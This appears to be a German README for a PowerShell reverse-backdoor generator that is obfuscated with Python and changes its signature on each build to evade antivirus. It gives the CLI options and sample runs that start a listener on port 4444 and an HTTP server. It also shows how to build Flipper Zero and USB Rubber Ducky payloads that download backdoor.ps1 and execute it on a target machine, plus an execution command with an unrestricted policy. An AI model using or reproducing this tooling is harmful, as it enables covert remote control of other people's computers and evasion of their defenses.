
Reverse-Backdoor, geschrieben in PowerShell und mit Python verschleiert. Sie generiert Payloads für beliebte Hacking-Geräte wie Flipper Zero und Hak5 USB Rubber Ducky und ändert nach jedem Build ihre Signatur, um AV zu umgehen.
/******************************************************************************
Reverse-Backdoor-Tool, geschrieben in PowerShell und verschleiert mit Python, das nach jedem Build eine neue Signatur liefert, um Erkennung zu vermeiden. Das Tool kann Payloads für beliebte Hacking-Geräte wie Flipper Zero und Hak5 USB Rubber Ducky erstellen. Verwenden Sie dieses Tool, um die Abwehrmechanismen Ihres Systems gegen fortgeschrittene Angriffstechniken zu testen.
usage: listen.py [-h] [--ip-address IP_ADDRESS] [--port PORT] [--random] [--out OUT] [--verbose] [--delay DELAY] [--flipper FLIPPER] [--ducky]
[--server-port SERVER_PORT] [--payload PAYLOAD] [--list--payloads] [-k KEYBOARD] [-L] [-H]
Powershell Backdoor Generator
options:
-h, --help show this help message and exit
--ip-address IP_ADDRESS, -i IP_ADDRESS
IP Address to bind the backdoor too (default: 192.168.X.XX)
--port PORT, -p PORT Port for the backdoor to connect over (default: 4444)
--random, -r Randomizes the outputed backdoor's file name
--out OUT, -o OUT Specify the backdoor filename (relative file names)
--verbose, -v Show verbose output
--delay DELAY Delay in milliseconds before Flipper Zero/Ducky-Script payload execution (default:100)
--flipper FLIPPER Payload file for flipper zero (includes EOL conversion) (relative file name)
--ducky Creates an inject.bin for the http server
--server-port SERVER_PORT
Port to run the HTTP server on (--server) (default: 8080)
--payload PAYLOAD USB Rubber Ducky/Flipper Zero backdoor payload to execute
--list--payloads List all available payloads
-k KEYBOARD, --keyboard KEYBOARD
Keyboard layout for Bad Usb/Flipper Zero (default: us)
-A, --actually-listen
Just listen for any backdoor connections
-H, --listen-and-host
Just listen for any backdoor connections and host the backdoor directory
C:\Users\DrewQ\Desktop\powershell-backdoor-main> python .\listen.py --verbose
[*] Encoding backdoor script
[*] Saved backdoor backdoor.ps1 sha1:32b9ca5c3cd088323da7aed161a788709d171b71
[*] Starting Backdoor Listener 192.168.0.223:4444 use CTRL+BREAK to stop
Im aktuellen Arbeitsverzeichnis wird eine Datei namens backdoor.ps1 erstellt.
Getestet auf Windows 11, Windows 10 und Kali Linux. Um dies als verstecktes Fenster und mit Persistenzzugriff auszuführen, folgen Sie der Anleitung
powershell.exe -File backdoor.ps1 -ExecutionPolicy Unrestricted
┌──(drew㉿kali)-[/home/drew/Documents]
└─PS> ./backdoor.ps1
Bei Verwendung dieser Angriffe wird ein HTTP-Server gestartet, der die Backdoor bereitstellt. Sobald die Backdoor abgerufen wurde, wird der HTTP-Server heruntergefahren.
Nachfolgend wird eine Datei namens powershell_backdoor.txt generiert, die beim Auslösen auf dem Flipper die Backdoor über HTTP von Ihrem Computer abruft und ausführt.
C:\Users\DrewQ\Desktop\powershell-backdoor-main> python .\listen.py --flipper powershell_backdoor --payload execute
[*] Started HTTP server hosting file: http://192.168.0.223:8989/backdoor.ps1
[*] Starting Backdoor Listener 192.168.0.223:4444 use CTRL+BREAK to stop
Legen Sie die von Ihnen angegebene Textdatei (z. B. powershell_backdoor.txt) auf Ihren Flipper Zero. Wenn der Payload ausgeführt wird, lädt er backdoor.ps1 herunter und führt sie aus.
Nachfolgend finden Sie eine Anleitung zum Erstellen einer inject.bin für den Hak5 USB Rubber Ducky.
C:\Users\DrewQ\Desktop\powershell-backdoor-main> python .\listen.py --ducky --payload BindAndExecute
[*] Started HTTP server hosting file: http://192.168.0.223:8989/backdoor.ps1
[*] Starting Backdoor Listener 192.168.0.223:4444 use CTRL+BREAK to stop
Eine Datei namens inject.bin wird in Ihrem aktuellen Arbeitsverzeichnis abgelegt. Für diese Funktion ist Java erforderlich. Wenn der Payload ausgeführt wird, lädt er backdoor.ps1 herunter und führt sie aus.
Um payload.txt für USB-Rubber-Ducky-Angriffe in inject.bin zu kodieren, verwende ich encoder.jar erstellt von .
Im Folgenden sind die SHA1-Hashes von backdoor.ps1 nach 5 Builds aufgeführt.
1e158f02484e5c58d74c1507a1773392ffacfca2
6d18230a419195d0f77519abc0238768956cdd58
558a8cbac40239c9e6660a45cc8fc5d02b5057d7
caf4d0c8424eceb960d5f5c526e83ecd485c4ac9
947b57824917842d79f9cbcac8a795aa7c2f8a49